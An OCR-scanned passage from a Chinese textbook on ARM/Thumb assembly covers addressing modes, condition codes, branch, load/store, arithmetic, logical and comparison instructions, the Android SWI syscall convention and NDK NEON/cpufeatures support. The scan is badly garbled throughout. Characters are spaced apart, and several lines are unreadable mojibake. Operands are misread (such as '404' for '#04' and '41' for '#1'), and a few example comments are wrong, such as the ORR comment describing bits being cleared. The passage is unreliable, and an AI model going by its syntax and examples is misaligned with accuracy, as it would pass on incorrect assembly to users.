LDMIB/STMIB, LDMDB/STMDB» 


LDM 和 STM 为 指令 前 缀 ， 表 示 多 寄存 器 寻 址 ， 即 一 次 可 以 传送 多 个 寄 
人 存 器 值 。IA、DA、 了 JIB、DB 为 指令 后 缀 ， 详 细 的 指令 介绍 请 参看 6.5.3 小 
节 。 


块 拷贝 寻 址 举例 : 
LDMIA R0! (R1-R3) @ 从 R0 寄 存 器 指 癌 的 存储 单元 中 读 取 3 个 字 到 R1-R3 寄 存 器 
STMIA R0! , {R1-R3} GIF filiR1-R37?$ 4£ 28] A ARERO V TAT I] FF] £f PC 7G 


6.4.9 ”相对 寻 址 


相对 寻 址 以 程序 计数 器 PC 的 当前 值 为 基地 址 ， 指 令 中 的 地 址 标号 作为 
偏 移 量 ， 将 两 者 相 加 之 后 得 到 操作 数 的 有 效 地 址 。 例 如 : 


BL NEXT 


s..... 


"n 


BL NEXT 是 跳 到 NEXT 标 号 处 执行 。 这 里 的 BL 采用 的 就 是 相对 寻 址 ， 
标号 NEXT 就 是 偏 移 量 。 


65 ”ARM 与 Thumb 指 令 集 


指令 集 是 处 理 器 的 核心 ， 随 着 ARM 处 理 器 版 本 的 升级 ， 支 持 的 指令 集 
也 在 不 断 的 增加 ， 其 中 被 广泛 使 用 的 应 属 ARM 指 令 集 与 Thumb 指 令 集 了 。 
Thumb 指 令 集 可 以 理解 为 ARM 指 令 集 的 一 个 子 集 ， 因 此 ， 本 节 将 两 种 指令 
集 放 在 一 起 ， 以 内 核 架 构 为 armv7-a 的 处 理 器 为 蓝本 进行 讲解 。 


6.5.1 指令 格式 


ARM 指 令 的 基本 格式 如 下 : 
<opcode>{ «cond» HSH.W|.N} <Rd>,<Rn>{,<operand2>} 


opcode 为 指令 助 记 符 。 如 MOV、ADD 等 。 本 章 主 要 讲解 不 同类 型 的 指 
令 助 词 符 及 其 含义 。 
cond 为 执行 条 件 。 它 的 取 值 如 表 6-2 所 示 。 
表 6-2 指令 条 件 码 列表 


条 件 码 助 记 符 bh W 
EQ Z=] 
NE Z=0 
CS/HS C=] 无 符号 数 大 于 或 等 于 
CC/LO C-0 无 符号 数 小 于 
MI | N24 fr 
PL N-0 EARE 
VS V-l 溢出 
VC V-0 没有 游 出 
HI Cel, Z20 无 符号 数 大 于 
LS C=0; Z-1 无 符号 数 小 于 或 等 于 
GE N=V 有 符号 数 大 于 或 等 于 
LT NI=V 有 符号 数 小 于 
GT Z=0，N=V 有 符号 数 大 于 
LE Z=1, N!=V 有 符号 数 小 于 或 等 于 
AL 任何 无 条 件 执行 〈 指 令 默 认 条 件 ) 


S 指 定 指 令 是 否 影响 CPSR 寄 存 器 的 值 。 如 ADDS、SUBS 等 。 

.W 与 .N 为 指令 宽度 说 明 符 。 在 armv6t2 及 更 高 版 本 的 Thumb 代 码 中 ， 部 
分 指令 的 编码 即 可 以 是 16 位 ， 也 可 以 是 32 位 ， 正 常情 况 下 ， 这 两 种 方式 的 
代码 都 是 有 效 的 ， 但 默认 情况 下 会 生成 16 位 的 代码 ， 如 果 想 要 生成 32 位 的 
编码 ， 则 可 以 为 指令 加 上 .WwW 宽度 说 明 符 。 无 论 是 ARM 代 码 还 是 Thumb 

(armv6t2 或 更 高 版 本 ) 代码 ， 都 可 以 在 其 中 使 用 .W 宽 度 说 明 符 ， 但 它 对 32 
位 的 代码 没有 影响 。 如 果 要 将 指令 汇编 为 16 位 编码 ， 则 可 以 为 指令 加 上 .N 
宽度 说 明 符 。 

Rd 为 目的 寄存 器 。 

Rn 为 第 一 个 操作 数 寄存 器 。 


operand2 为 第 二 个 操作 数 。 第 二 个 操作 数 可 以 是 立即 数 、 寄 存 器 或 寄存 
器 移 位 操作 。 

指令 格式 举例 如 下 : 

MOV RO, #2 

ADD R1, R2, R3 

SUB R2, R3, Ra DSE i2 


65.22 WRS 


跳 转 指令 又 称 为 分 支 指令 ， 它 可 以 改变 指令 序列 的 执行 流程 。ARM 中 
有 两 种 方式 可 以 实现 程序 跳 转 : 一 种 是 使 用 跳 转 指令 直接 跳 转 ; 另 一 种 是 
给 PC 寄存 器 直接 赋值 实现 跳 转 。 

跳 转 指令 有 以 下 4 条 。 

1. B 跳 转 指令 

B(cond) label 

B 指 令 属于 ARM 指 令 集 ， 是 最 简单 的 分 支 指 令 。 当 执行 B 指 令 时 ， 如 果 
条 件 cond 满 足 ，ARM 处 理 器 将 立即 跳 转 到 label 指 定 的 地 址 处 继续 执行 。 例 
如 :“BNE LABEL” 表 示 条 件 码 Z=0 时 跳 转 到 LABEL 处 执行 。 

2. BL 带 链 接 的 跳 转 指令 

BL{cond} label 

当 执行 BL 指 令 时 ， 如 果 条 件 cond 满 足 ， 会 首先 将 当前 指令 的 下 一 条 指 
令 的 地 址 拷贝 到 R14 ( 即 LR) 寄存 器 中 ， 然 后 跳 转 到 lable 指 定 的 地 址 处 继 
续 执行 。 这 条 指令 通常 用 于 调用 子 程序 ， 在 子 程 序 的 尾部 ， 可 以 通过 “MOV 
PC, LR” 返 回 到 主 程序 中 。 

3. BX 带 状态 切换 的 跳 转 指令 

BX{cond} Rm 

当 执 行 BX 指令 时 ， 如 果 条 件 cond 满 足 ， 则 处 理 器 会 判断 Rm 的 位 [0] 是 
否 为 1， 如 果 为 1 则 跳 转 时 自动 将 CPSR 寄 存 器 的 标志 T 置 位 ， 并 将 目标 地 址 
处 的 代码 解释 为 Thumb 代 码 来 执行 ， 即 处 理 器 会 切换 至 Thumb 状 态 ; 反之 ， 


若 Rm 的 位 [0] 为 0， 则 跳 转 时 自动 将 CPSR 宵 存 器 的 标志 T 复 位 ， 并 将 目标 地 
址 处 的 代码 解释 为 ARM 代 码 来 执行 ， 即 处 理 器 会 切换 到 ARM 状 态 。 例 如 下 


ADR R0, thumbcode-1 
BX RO eit fjthumbcodeAFJAT, JE ALIE 8 UJ 7g Thumb BU. 


4. BLX 带 链接 和 状态 切换 的 跳 转 指 令 

BLX{ cond} Rm 

BLX 指 令 集 合 了 BL 与 BX 的 功能 ， 当 条 件 满足 时 ， 除 了 设置 链接 寄存 
器 ， 还 根据 Rm 位 [0] 的 值 来 切换 处 理 器 状态 。 


6.5.3 ”存储 器 访问 指令 


存储 器 访问 操作 包括 从 存储 器 中 加 载 数据 、 人 存储 数据 到 存储 器 、 寄 存 
器 与 存储 器 间 数 据 的 交换 等 。 

LDR 

LDR 用 于 从 存储 器 中 加 载 数据 到 寄存 器 中 ， 它 的 格式 如 下 : 

LDRt(typej(cond) Rd, label 

LDRD(cond) Rd, Rd2, label 

type 指 明了 操作 的 数据 的 大 小 。 它 的 取 值 如 表 6-3 所 示 。 


表 6-3 ”tyte 取 值 
type 含 X 
B 无 符号 字 节 (加 载 时 零 扩 展 为 32 位 ) 
SB 有 符号 字 节 【〈 加 载 时 符号 扩展 为 32 位 ) 
H 无 符号 半 字 (加 载 时 零 扩 展 为 32 位 ) 
SH 有 符号 半 字 【加载 时 符号 扩展 为 32 位 ) 


cond 为 执行 条 件 ， 它 的 取 值 如 表 6-2 所 示 。 

Rt 为 要 加 载 的 寄存 器 。 

labe] 为 要 读 取 的 内 存 地 址 。 它 的 表示 方法 有 三 种 : 

1. 直接 偏 移 量 。 如 : LDR R8, [R9, #04] 、LDR R8, [R9], 404 
2. 寄存 器 偏 移 。 如 : LDR R8, [R9, R10, 404] 

3. 相对 PC。 如 : LDR R8, label1 

LDRD 一 次 加 载 双 字 的 数据 ， 将 数据 加 载 到 Rd 与 Rd2 寄 存 器 中 。 


LDRD 指 令 举例 如 下 : 
LDRD R0, R1, label2 @ 从 标号 labe12 指 向 的 内 存 中 加 载 两 个 字 的 数据 到 R0 与 R1 寄 存 器 中 
STR 


STR 用 于 存储 数据 到 指定 地 址 的 存储 单元 中 。 它 的 格式 如 下 : 

STR{type}{ cond) Rd, label 

STRD(cond) Rd, Rd2, label 

STR 指令 与 LDR 指 令 的 格式 相同 ， 只 是 type 中 的 SB 与 SH 对 STR 无 效 。 
STR 指令 举例 如 下 : 

STR RO, [R2, $04] @ 将 R0 寄 存 器 的 数据 存储 到 R2+4 所 指向 的 存储 单元 。 

LDM 

LDMAJ AMIE ERTER TIRA AG U— Ir RERNUXR. EAI 
式 如 下 : 

LDM{addr_mode}Hcond} Rn{!} reglist 

addr_mode 取 值 如 表 6-4 所 示 。 


表 6-4 ”addr_mode 取 值 


addr mode j 义 
IA Increase After， 基 址 寄存 器 在 执行 指令 之 后 增加 ， 这 是 默认 情况 。 
IB Increase Before， 基 址 寄存 器 在 执行 指令 之 前 增加 CX ARM). 
DA Decrease After， 基 址 寄存 器 在 执行 指令 之 后 减少 〈 仅 ARM). 
DB Decrease Before， 基 址 寄存 器 在 执行 指令 之 前 减少 。 
FD 满 递 减 堆栈 。 堆 栈 向 低地 址 生长 ， 堆 栈 指针 指 问 最 后 一 个 入 栈 的 有 效 数 
据 项 。 
FA 满 递 增 堆 栈 。 堆栈 向 高 地 址 生长 , 堆栈 指针 指 癌 下 一 个 要 放 入 的 空地 址 。 
ED 空 递减 堆栈 。 堆 栈 向 低地 址 生长 。 
EA 空 递 增 堆栈 。 堆 栈 向 高 地 址 生长 。 


cond 为 表 6-2 所 示 的 执行 条 件 。 

Rn 为 基地 寄存 器 ， 用 于 存储 初始 地 址 。 

! HANER. MRS! ， 则 最 终 地 址 将 写 回 到 Rn 寄存 器 中 。 

reglist 为 用 来 存储 数据 的 寄存 器 列表 ， 用 大 括号 括 起 来 。 寄 存 器 列表 可 
以 是 多 个 连续 的 寄存 器 ， 多 个 寄存 器 可 以 用 “-" 连 接 ， 如 R0-R3 表 示 连 接 的 
R0 至 R3 寄 存 器 列表 ， 如 果 多 个 寄存 器 不 是 连续 的 ， 则 使 用 逗号 将 它们 分 隔 
开 来 ， 如 {R0, R1, R7}。 


LDM 指 令 举 例如 下 : 
LDMIA RO!, (R1-R3) e@ 依 次 加 载 R0 指 加 的 存储 单元 的 数据 到 R1、R2、R3 寄 存 器 。 
STM 


STM 将 一 个 寄存 器 列表 的 数据 存储 到 指定 的 存储 单元 。 它 的 格式 如 


STM{addr_mode}{cond} Rn{!} reglist 
STM 与 LDM 的 格式 是 一 样 的 ，STM 指 令 举 例如 下 : 


STMDB R1!, (R3-R6, R11) @ 将 R3-R6，R11 寄 存 器 的 内 容 存储 到 R1 指 向 的 存储 单元 。 


STMFD SP!, (R3-R7) @ 将 R3-R7 寄 存 器 压 入 堆栈 ， 功 能 等 价 于 STMDB SP!, (R3-R7). 
PUSH 

PUSH 将 寄存 器 推 入 满 递减 堆栈 。 它 的 格式 如 下 : 

PUSHf{cond} reglist 


PUSH 指令 举例 如 下 : 
PUSH (r0, r4-r7) @ 将 RO、R4-R7 寄 存 器 内 容 压 入 堆栈 。 


POP 

POP 从 满 递 减 堆 栈 中 弹出 数据 到 寄存 器 。 它 的 格式 如 下 : 
POP{cond} reglist 

POP 指令 举例 如 下 : 

POP (r0, r4-r7) 8@ 将 RO0、R4-R7 寄 存 髓 从 堆栈 中 弹出 。 

SWP 

SWP 用 于 寄存 器 与 存储 器 之 间 的 数据 交换 。 它 的 格式 如 下 : 
SWP{B}H cond} Rd, Rm, [Rn] 

B 是 可 选 的 字 节 ， 知 有 B， 则 交换 字 节 ， 否 则 交换 32 位 的 字 。 
cond 为 表 6-2 所 示 的 执行 条 件 。 

Rd 为 要 从 存储 器 中 加 载 数据 的 寄存 器 。 

Rm 为 写 入 数据 到 存储 器 的 寄存 器 。 

Rn 为 需要 进行 数据 交换 的 存储 器 地 址 。Rn 不 能 与 Rd 和 Rm 相同 。 
如 果 Rd 与 Rm 相 同 ， 可 实现 单个 寄存 器 与 存储 器 的 数据 交换 。 例 如 : 


SWP R1, R1, [RO] @ 将 R1 寄 存 器 与 RO 指向 的 存储 单元 的 内 容 进 行 交 换 。 
SWPB R1, R2, [RO]  @ 从 R0 指 向 的 存储 单元 读 取 一 个 字 节 存 入 R1 (高 24 位 清 零 ) ， 然 后 将 R2 寄 
存 器 的 字 节 内 容 存储 到 该 存储 单元 


65.4 ”数据 处 理 指令 


数据 处 理 指令 包括 数据 传送 指令 、 算 术 运 算 指 令 、 逻 辑 运 算 指 令 以 及 
比较 指令 4 类 。 数 据 处 理 指 令 主要 是 对 寄存 器 间 的 数据 进行 操作 。 所 有 的 数 
据 处 理 指令 均 可 选择 使 用 S 后 缀 ， 来 决定 是 否 影响 状态 标志 ， 比 较 指 令 不 需 
要 SS 后缀 ， 它 们 会 直接 影响 状态 标志 。 

数据 传送 指令 主要 用 于 寄存 器 间 的 数据 传送 。 

MOV 

MOV 为 ARM 指 令 集中 使 用 最 频繁 的 指令 ， 它 的 功能 是 将 8 位 的 立即 数 
或 寄存 器 的 内 容 传送 到 目标 寄存 器 中 。 指 令 格式 如 下 : 

MOV{cond¥ S} Rd, operand2 


MOV 指 令 举 例如 下 : 
MOV R0, #8 QRO=8 


MOV R1, RO QGR1-RO 
MOVS R2, R1, LSL #2 BR2=RL*4， 影 响 状 态 标志 


MVN 
MVN 为 数据 非 传 送 指令 。 它 的 功能 是 将 8 位 的 立即 数 或 寄存 器 按 位 取 反 


后 传送 到 目标 寄存 器 中 。 指 令 格 式 如 下 : 
MVN{cond HS} Rd, operand2 


MVN 指 令 举 例如 下 : 

MVN RO, #0xFF aROZOxFFFFFFOO 

MVN R1, R2 @ 将 R2 寄 存 器 数据 取 反 后 存 入 R1L 寄 存 器 中 
算术 运算 指令 主要 完成 加 、 减 、 乘 、 除 等 算术 运算 。 

ADD 


ADD 为 加 法 指令 。 它 的 功能 是 将 Rn 寄存 器 与 operand2 的 值 相 加 ， 结 
保存 到 Rd 寄存 器 。 指 令 格 式 如 下 : 
ADD(condJ(S) Rd, Rn, operand2 


ADD 指 令 举 例如 下 : 
ADD RO, R1, #2 @RO=R1+2 
ADDS RO, R1, R2 QRO-RI-«R2, bk. 


ADD RO,R1, LSL #3 QGRO-R1*8 


ADC 


ADC 为 带 进位 加 法 指令 。 它 的 功能 是 将 Rn 寄存 器 与 operand2 的 值 相 
加 ， 再 加 上 CPSR 寄 存 器 的 C 条 件 标 志 位 的 值 ， 最 后 将 结果 保存 到 Rd 寄存 
器 。 指 令 格式 如 下 : 

ADC{cond HS} Rd, Rn, operand2 


已 公关 š 
ADC 指 令 举例 如 下 : 
ADD RO, RO, R2 
ADC R1, R1, R3 @ 两 条 指令 完成 64 位 加 法 ，(R1，R0) = (R1, RO) + (R3, R2) 


SUB 


SUB 为 减法 指令 。 它 的 功能 是 用 Rn 寄存 器 减 去 operand2 的 值 ， 结 果 保 存 
到 Rd 寄存 器 中 。 指 令 格 式 如 下 : 
SUB{cond HS} Rd, Rn, operand2 


SUB 指 令 举 例如 下 : 

SUB RO, R1, 44 QGRO-R1-4 

SUBS R0, R1, R2 eeR0=R1-R2， 影 响 标 志 位 
RSB 


RSB 为 逆向 减法 指令 。 它 的 功能 是 用 operand2 减 去 Rn 宵 存 器 ， 结 果 保 存 
到 Rd 寄存 器 中 。 指 令 格 式 如 下 : 
RSB{cond HS} Rd, Rn, operand2 


RSB 指 令 举 例如 下 : 

RSB RO, R1, #0x1234 GR0-0x1234-R1 
RSB RO, R1 aRO--R1 

SBC 


SBC 为 带 进 位 减法 指令 。 它 的 功能 是 用 Rn 琳 存 器 减 去 operand2 的 值 ， 表 
减 去 CPSR 寄 存 器 的 C 条 件 标 志 位 的 值 ， 最 后 将 结果 保存 到 Rd 寄存 器 。 指 念 
格式 如 下 : 

SBC{cond HS} Rd, Rn, operand2 


BA” S D 
SBC 指 令 举 例如 下 : 
SUBS. R0, RO, R2 
SBC R1, R1, R3 e 了 两 条 指令 完成 64 位 减法 ，(R1，R0) = (R1, RO) - (R2, R3) 


RSC 


RSC 为 带 进 位 逆向 减法 指令 。 它 的 功能 是 用 operand2 减 去 Rn 寄存 器 ， 再 
减 去 CPSR 寄 存 器 的 C 条 件 标志 位 的 值 ， 最 后 将 结果 保存 到 Rd 寄存 器 。 指 令 
格式 如 下 : 

RSC{ cond}HS} Rd, Rn, operand2 


RSC 指 令 举 例如 下 : 
RSBS R2, RO, #0 


RSC R3, R1, #0 8@ 两 条 指令 完成 64 位 数 取 反 。(R3，R2) = -(R1, RO) 
MUL 


MULZJ321u3E;kiH 9. CBJUJBEx I RmSfz28 5 Rng AAR, 
结果 的 低 32 位 保存 到 Rd 寄存 器 中 。 指 令 格式 如 下 : 
MUL(cond)(S) Rd, Rm, Rn 


MUL 指 令 举 例如 下 : 

MUL R0, R1, R2 QGRO-R1XR2 

MULS R0, R2, R3 GeR0=R2XR3， 影 响 CPSR 的 N 位 与 Z 位 
MLS 


MLS 指 令 将 Rm 寄 存 器 和 Rn 寄存 器 中 的 值 相 乘 ， 然 后 再 从 Ra 寄存 器 的 值 
中 减 去 乘积 ， 最 后 将 所 得 结果 的 低 32 位 存 入 Rd 寄存 器 中 。 指 令 格 式 如 下 : 
MLS(cond)( S) Rd, Rm, Rn, Ra 


MLS 指 令 举例 如 下 : 
MLS RO, R1, R2, R3 eR0 的 值 为 R3 - RLXR2 结 果 的 低 32 位 。 
MLA 


MLA 指 令 将 Rm 寄 存 器 和 Rn 寄存 器 中 的 值 相 乘 ， 然 后 再 将 乘积 与 Ra 寄 
存 器 中 的 值 相 加 ， 最 后 将 结果 的 低 32 位 存 入 Rd 寄存 器 中 。 指 令 格 式 如 下 : 
MLA{ cond HS} Rd, Rm, Rn, Ra 


MLA 指 令 举例 如 下 : 
MLA RO, R1, R2, R3 @R0 的 值 为 R3 + RLXR2 结 果 的 低 32 位 。 
UMULL 


UMULL 指 令 将 Rm 寄 存 器 和 Rn 寄存 器 的 值 作为 无 符号 数 相 乘 ， 然 后 将 
结果 的 低 32 位 存 入 RdLo 寄 存 器 ， 高 32 位 存 入 RdHi 寄 存 器 。 指 令 格式 如 下 : 

UMULL{cond HS} RdLo, RdHi, Rm, Rn 

UMULL 指 令 举 例如 下 : 


UMULL RO, R1, R2 ,R3 @ (R1, RO) = R2XR3 


UMLAL 
UMLAL 指 令 将 Rm 寄 存 器 和 Rn 寄存 器 的 值 作 为 无 符号 数 相 乘 ， 然 后 将 


64 位 的 结果 与 RdHi、RdLo 组 成 的 64 位 数 相 加 ， 结 果 的 低 32 位 存 入 RdLo 寄 存 


器 


高 32 位 存 入 RdHi 寄 存 器 。 指 令 格 式 如 下 : 
UMLAL(cond)(S) RdLo, RdHi, Rm, Rn 


UMLAL 指 令 举例 如 下 : 
UMLAL RO, R1, R2 ,R3 (RI; RO) = R2XR3 + (R1, RO) 


SMULL 
SMULL 指 令 将 Rm 寄 存 器 和 Rn 寄存 器 的 值 作 为 有 符号 数 相 乘 ， 然 后 将 


结果 的 低 32 位 存 入 RdLo 寄 存 器 ， 高 32 位 存 入 RdHi 寄 存 器 。 指 令 格式 如 下 : 


SMULL{condHS} RdLo, RdHi, Rm, Rn 


SMULL 指 令 举 例如 下 : 
SMULL RO, R1, R2 ,R3 Q(Rl1, RO) = R2XR3 
SMLAL 


SMLAL 指 令 将 Rm 寄 存 器 和 Rn 寄存 器 的 值 作为 有 符号 数 相 乘 ， 然 后 将 


64 位 的 结果 与 RdHi、RdLo 组 成 的 64 位 数 相 加 ， 结 果 的 低 32 位 存 入 RdLo 寄 存 
器 ， 高 32 位 存 入 RdHi 寄 存 器 。 指 令 格式 如 下 : 


SMLAL{cond HS} RdLo, RdHi, Rm, Rn 


SMLAL 指 令 举例 如 下 : 
SMLAL RO, R1, R2 ,R3 Q(Rl, RO) = R2XR3 + (R1, RO) 


SMLAD 
SMLAD 指 令 将 Rm 寄 存 器 的 低 半 字 和 Rn 寄存 器 的 低 半 字 相 乘 ， 然 后 将 


Rm 寄 存 器 的 高 半 字 和 Rn 的 高 半 字 相 乘 ， 最 后 将 两 个 乘积 与 Ra 寄存 器 的 值 相 
加 并 存 入 Rd 寄存 器 。 指 令 格式 如 下 : 


SMLAD{ cond HS} Rd, Rm, Rn, Ra 


SMLSD 
SMLSD 指 令 将 Rm 寄 存 器 的 低 半 字 和 Rn 寄存 器 的 低 半 字 相 乘 ， 然 后 将 


Rm 寄 存 器 的 高 半 字 和 Rn 的 高 半 字 相 乘 ， 接 着 使 用 第 一 个 乘积 减 去 第 二 个 乘 


积 ， 
下 : 


最 后 将 所 得 的 差 值 与 Ra 寄存 器 的 值 相 加 并 存 入 Rd 寄存 器 。 指 令 格 式 如 


SMLSD{cond HS} Rd, Rm, Rn, Ra 

SDIV 

SDIV 为 有 符号 数 除法 指令 。 它 的 格式 如 下 : 
SDIV{cond} Rd, Rm, Rn 


SDIV 指 令 举 例如 下 : 
SDIV RO, R1, R2 


UDIV 


UDIV 为 无 符号 数 除法 指令 。 它 的 格式 如 下 : 
UDIV{cond} Rd, Rm, Rn 


UDIV 指 令 举 例如 下 : 
UDIV RO, R1, R2 GRO = R1 / R2 
ASR 


ASR 为 算术 右 移 指令 。 它 的 功 能 是 将 Rm 寄 存 器 算术 右 移 operand2 位 , 


并 使 用 符号 位 填充 空位 ， 移 位 结果 保存 到 Rd 寄存 器 中 。 它 的 指令 格式 如 
F: 


ASR(cond)(S) Rd, Rm, operand2 


ASR 指 令 举 例如 下 : 
ASR RO, R1, #2 @ 将 R1 寄 存 器 的 值 作为 有 符号 数 右 移 2 位 后 赋 给 R0 寄 存 器 。 


逻辑 运算 指令 主要 完成 与 、 或 、 异 或 、 移 位 等 逻辑 运算 操作 。 
AND 
AND 为 逻辑 与 指令 。 它 的 指令 格式 如 下 : 


AND{cond HS} Rd, Rn, operand2 


AND 指 令 举 例如 下 : 
AND RO, RO, #1 @ 指 令 用 来 测试 RO 的 最 低位 
ORR 


ORR 为 逻辑 或 指令 。 它 的 指令 格式 如 下 : 

ORR{cond HS} Rd, Rn, operand2 

ORR 指 令 举例 如 下 : 

ORR R0, RO, #0x0F ”@ 指 令 执 行 后 保留 RO 的 低 四 位 ， 其 余 位 清 0 
EOR 


EOR 为 异 或 指令 。 它 的 指令 格式 如 下 : 
EOR(cond)(S) Rd, Rn, operand2 


EOR 指 令 举 例如 下 : 
EOR R0, RO, RO @ 指 令 执 行 后 RO 的 值 为 0 
BIC 


BIC 为 位 清除 指令 。 它 的 功能 是 将 operand2 的 值 取 反 ， 然 后 将 结果 与 Rn 
寄存 器 的 值 相 “与 ?并 保存 到 Rd 寄存 器 中 。 它 的 指令 格式 如 下 : 
BIC{cond}HS} Rd, Rn, operand2 


BIC 指 令 举 例如 下 : 
BIC RO, RO, #0x0F @ 将 RO 低 四 位 清 0， 其 余 位 保持 不 变 
LSL 


LSL 为 逻辑 左 移 指 令 。 它 的 功能 是 将 Rm 寄存 器 逻辑 左 移 operand2 位 ， 
并 将 空位 清 0， 移 位 结果 保存 到 Rd 寄存 器 中 。 它 的 指令 格式 如 下 : 
LSL{cond}{S} Rd, Rm, operand2 


LSL 指 令 举 例如 下 : 
LSL RO, R1, #2 BRO =- RLY 


LSR 


LSR 为 逻辑 右 移 指令 。 它 的 功能 是 将 Rm 琳 存 器 逻辑 右 移 operand2 位 ， 
并 将 空位 清 0， 移 位 结果 保存 到 Rd 寄存 器 中 。 它 的 指令 格式 如 下 : 
LSR (cond)(S) Rd, Rm, operand2 


LSR 指 令 举例 如 下 : 
LSR RO, R1, #2 GRO z Rl / 4 
ROR 


ROR 为 循环 右 移 指令 。 它 的 功能 是 将 Rm 寄存 器 循环 右 移 operand2 位 ， 
寄存 器 右边 移出 的 位 移 回 到 左边 ， 移 位 结果 保存 到 Rd 寄存 器 中 。 它 的 指令 
格式 如 下 : 

ROR {cond}{S} Rd, Rm, operand2 


LSR 指 令 举 例如 下 : 
ROR R1, R1, 41 @ 将 R1 寄 存 器 的 最 低位 移 到 最 高 位 
RRX 


RRX 为 带 扩 展 的 循环 右 移 指 令 。 它 的 功能 是 将 Rm 宁 存 器 循环 右 移 1 
人 位， 寄存器 最 高 位 用 标志 位 的 值 填充 ， 移 位 结果 保存 到 Rd 寄存 器 中 。 它 的 
指令 格式 如 下 : 


RRX {cond HS} Rd, Rm 

LSR 指 令 举 例如 下 : 

RRX R1, R1 @ 指 令 执 行 后 R1 寄 存 器 右 移 1 位 ， 最 高 位 用 标志 填充 
比较 指令 用 于 比较 两 个 操作 数 之 间 的 值 。 

CMP 


CMP 指 令 使 用 Rn 寄存 器 减 去 operand2 的 值 ， 这 与 SUBS 指 令 功 能 相同 ， 
但 CMP 指 令 不 保存 计算 结果 ， 仅 根据 比较 结果 设置 标志 位 。 指 令 格式 如 
T: 

CMP {cond} Rn, operand2 


CMP 指 令 举 例如 下 : 
CMP RO, #0 @ 判 断 R0 寄 存 器 值 是 否 为 0 


CMN 


CMN 指 令 将 operand2 的 值 加 到 Rn 寄存 器 上 ， 这 与 ADDS 指 令 功 能 相 
同 ， 但 CMN 指 令 不 保存 计算 结果 ， 仅 根据 计算 结果 设置 标志 位 。 指 令 格 式 
如 下 : 

CMN {cond} Rn, operand2 


CMN 指 令 举例 如 下 : 
CMN RO, R1 
TST 


TST WMA S t DREE RnZE£8BJ(BToperand2BS EHT 
“与 ”运算 ， 这 与 ANDS 指 令 功能 相同 ， 但 TST 指 令 不 保存 计算 结果 ， 仅 根据 
计算 结果 设置 标志 位 。 指 令 格式 如 下 : 

TST {cond} Rn, operand2 


TST 指 令 举 例如 下 : 
TST RO, #1 @ 判 断 RO 寄 存 器 最 低位 是 否 为 1 
TEQ 


TEQ 的 功能 是 将 Rn 寄存 器 的 值 和 operand2 的 值 进行 “ 异 或 运算， 这 与 
EORS 指 令 功能 相同 ， 但 TEQ 指 令 不 保存 计算 结果 ， 仅 根据 计算 结果 设置 标 
志 位 。 指 令 格式 如 下 : 

TEQ {cond} Rn, operand2 


TEQ 指 令 举 例如 下 : 
TEQ RO, R1 e@ 判 断 R0 寄 存 器 与 R1 寄 存 器 的 值 是 否 相 等 


655 “其它 指令 


除了 上 面 讲 到 的 指令 外 ， 还 有 一 些 不 常用 或 未 归 类 的 杂项 指令 。 


SWI 


SWI 是 软 中 断 指令 。 该 指令 用 于 产生 软 中 断 ， 从 而 实现 从 用 户 模 式 到 管 
理 模 式 的 切换 。 如 系统 功能 调用 。 指 令 格式 如 下 : 

SWI {cond}, immed_24 

immed_24 为 24 位 的 中 断 号 ， 在 Android 的 系统 中 ， 系 统 功 能 调用 为 0 号 
中 断 ， 使 用 R7 寄 存 器 存放 系统 调用 号 。 使 用 R0-R3 寄 存 器 来 传递 系统 调用 的 
前 4 个 参数 ， 对 于 大 于 4 个 参数 的 调用 ， 剩 余 参数 采用 堆栈 来 传递 。 例 如 调 
用 exit(0) 的 汇编 代码 如 下 : 


MOV RO, #0 @ 参 数 0 

MOV R7, #1 @ 系 统 功能 与 1 为 exit 
SWI #0 @ 执 行 exit (0) 
NOP 


NOP 为 空 操 作 指 令 。 该 指令 仅 用 于 空 操作 或 字 节 对 齐 。 指 令 格 式 只 有 
一 个 操作 码 NOP。 

MRS 

MRS 为 读 状态 寄存 器 指令 。 该 指令 格式 如 下 : 

MRS Rd, psr 

psr 的 取 值 可 以 是 CPSR 或 SPSR。 

MRS 指 令 举 例如 下 : 

MRS RO, CPSR Qi CPSR?I (fF Ar SIRO ffi! 

MSR 

MSR 为 写 状 态 寄 存 器 指令 。 该 指令 格式 如 下 : 

MSR Rd, psr. fields, operand2 

psr 的 取 值 可 以 是 CPSR 或 SPSR。 

field 指 定 传送 的 区 域 ， 它 的 取 值 如 表 6-5 所 示 (field 所 代表 的 字母 必须 
为 小 写 ) 。 

表 6-5 ”field 取 值 


field ^ X 
c 控制 域 屏蔽 学 节 (psr[7…0]) 
X 扩展 域 屏蔽 字 节 (psr[15…8]) 
s 状态 域 屏蔽 字 节 (psr[23…16]) 
f 标志 域 屏蔽 字 节 (psr[31…24] ) 
MSR 指 令 举 例如 下 : 
MRS RO, CPSR 8e 读 取 CPSR 寄 存 器 到 R0 寄 存 回 中 
BIC RO, RO, #0x80 ”@ 清 除 R0 寄 存 器 第 7 位 
MSR CPSR c, RO QJT Ji IRQ HT 
MOV PC, LR @ 子 程序 返回 


用 于 多 媒体 编程 与 浮 点 计算 的 NEON 与 VFP 指 令 


NEON 与 VFP 指 令 集 是 ARM 指 令 集 的 扩展 ， 多 用 于 多 媒体 编程 与 浮 点 
计算 。 从 Android 原 生 程 序 开发 包 (Android NDK) r3 版 本 开始 ， 加 入 了 对 
NEON 与 VFP 指 令 集 的 支持 ， 如 果 想 使 用 NEON 指 令 集 ， 需 要 在 Android.mk 
文件 中 加 入 一 行 “LOCAL_ARM_NEON := true”，NEON 是 ARMv7 才 支持 的 
指令 集 ， 因 此 ， 还 需要 设置 TARGET_ARCH_ABI 的 值 为 armeabi-v7a。 尽 管 
如 此 还 不 够 ，NEON 与 VFP 指 令 集 作 为 处 理 器 的 “附加 ”指令 集 ， 在 很 多 手机 
设备 的 处 理 器 中 可 能 不 支持 ， 为 了 解决 这 个 问题 ，Android NDK 提 供 了 一 个 
“cpufeatures” 库 来 让 开发 者 在 运行 时 检测 处 理 器 的 能 力 。 使 用 “cpufeatures” 
HE 的 方法 是 首先 在 Androidmk 文件 中 添加 “$(call import- 
module,android/cpufeatures)”， 然 后 在 C/C++ 代码 中 包含 尖 文 件 “cpu- 
features.h”， 该 头 文 件 中 定义 了 一 些 结构 体 与 枚 举 常量 ， 并 且 包 含 了 
android getCpuFamily(). android getCpuFeatures() 与 android_getCpuCount () 
三 个 函数 。 

android getCpuFamily() EK| 2X FH RRRA HE 28 BJ ZR IS io. XT ARMAR 
H BJ Rh SB zE CK X6 . CC d Zoo I — ^ 6 s fü 
ANDROID CPU FAMILY ARM. 


android_getCpuFeatures(O) 了 图 数 用 来 检测 处 理 器 支持 的 指令 集 ， 如 果 处 理 
